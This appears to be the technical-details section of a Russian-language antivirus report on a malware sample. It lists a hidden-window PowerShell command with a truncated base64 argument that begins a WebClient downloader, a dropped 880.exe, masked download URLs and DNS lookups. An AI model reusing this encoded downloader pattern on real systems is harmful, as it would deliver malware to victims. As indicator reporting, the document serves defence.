Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByADEAMABfAF8AOQA9ACgAJwBQADcAJwArACcANgAnACsAJwA0ADIAMwA5ACcAKQA7ACQAbABfADgANwA4ADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAegA3ADcAMgA3AF8ANwBfAD0AKAAnAG...
- %HOMEPATH%\880.exe
- %HOMEPATH%\880.exe
- 'mo####arlosalud.com':80
- 'na##40.com':80
- http://mo####arlosalud.com/33x7eCfeBy
- http://na##40.com/bGv61ju
- DNS ASK le####abasta.com
- DNS ASK mo####arlosalud.com
- DNS ASK na##40.com
- DNS ASK td####ctronic.net
- DNS ASK pi###bs.tech
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByADEAMABfAF8AOQA9ACgAJwBQADcAJwArACcANgAnACsAJwA0ADIAMwA5ACcAKQA7ACQAbABfADgANwA4ADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAegA3ADcAMgA3AF8ANwBfAD0AKAAnAG...' (со скрытым окном)